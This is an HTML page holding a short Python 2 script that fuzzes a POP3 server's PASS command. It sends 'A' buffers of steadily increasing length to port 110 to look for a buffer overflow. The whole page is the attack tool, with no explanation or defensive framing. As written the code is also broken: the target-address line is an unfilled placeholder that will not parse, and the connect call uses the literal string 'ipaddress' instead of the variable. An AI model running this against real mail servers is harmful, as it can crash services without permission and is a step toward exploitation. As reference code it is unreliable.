<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>pop3 password fuzz</title>
</head><body>#!/usr/bin/python<br/>
import socket<br/>
<br/>
# Create an array of buffers, while incrememnting them<br/>
<br/>
ipaddress=IPADDRESS GOES HERE<br/>
buffer=["A"]<br/>
counter=100<br/>
while len(buffer) &lt;= 30:<br/>
&#09;buffer.append("A"*counter)<br/>
&#09;counter=counter+200<br/>
<br/>
for string in buffer:<br/>
&#09;print "Fuzzing PASS with %s bytes" % len(string)<br/>
&#09;s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)<br/>
&#09;connect=s.connect(('ipaddress',110))<br/>
&#09;s.recv(1024)<br/>
&#09;s.send('USER test\r\n')<br/>
&#09;s.recv(1024)<br/>
&#09;s.send('PASS ' + string + '\r\n')<br/>
&#09;s.send('QUIT\r\n')<br/>
&#09;s.close()</body></html>